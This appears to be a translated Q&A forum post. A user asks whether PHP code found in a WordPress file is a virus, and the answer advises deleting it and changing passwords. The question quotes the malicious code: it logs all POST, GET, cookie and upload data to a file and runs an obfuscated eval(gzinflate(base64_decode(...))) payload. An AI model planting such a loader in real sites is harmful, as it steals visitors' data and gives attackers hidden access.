我在wp-include中找到了一个名为class-wp-upgrader.php的文件,其中包含一些奇怪的代码:
<?php error_reporting(0); ob_start(); var_dump($_POST, $_GET, $_COOKIE, $_FILES); $output = ob_get_clean(); $fp = fopen('./error_log', 'a'); fwrite($fp, print_r($output, TRUE)); fclose($fp); ob_end_clean(); eval(gzinflate(base64_decode("1X39e9q40ujP3efZ/0H1yVnDlhAgTbcJJWm+Q5omachX0+RyjDHgYrDXhpC0p//7nRlJtvwBId3d9753z3MaLI1Go9HXaDQz2lh/t+H1vF9/Wfr9919/Yb+zq8YJq/BfVos1epbjsNYjc89amLj06y//WjDGo17TM4KA1Zj2ZtlY7ZQs449Wa/VtaaX0x+qb1pvXq9bblddvy29fr2jVX39ZMF3H9RH6X+0OT2lbHWPsjJqGObLdIWTpe7ZjBR+NoQ7Z7yHbHlo5vbF7tNc83Tw/0Aus2dyrH+02m3kAwP/ZnRwLRr7nBrmFZmP37HL37It+cH5+2ryAr+bm/u7xuX5X0Pddt+tYep69rNVYx3ACi+XZ919/edGzjLbl56jMUrlYYq9Lr9mxO2J[...]ZBlj99ZeN9f8L")));
是病毒吗?
答案 0 :(得分:2)
无论是什么,都不是默认Wordpress代码的一部分。
您应删除该文件,更改Wordpress安装和数据库中所有用户的密码,并检查您的网站是否有可能的入口点。如果您还没有,请将Wordpress升级到最新版本。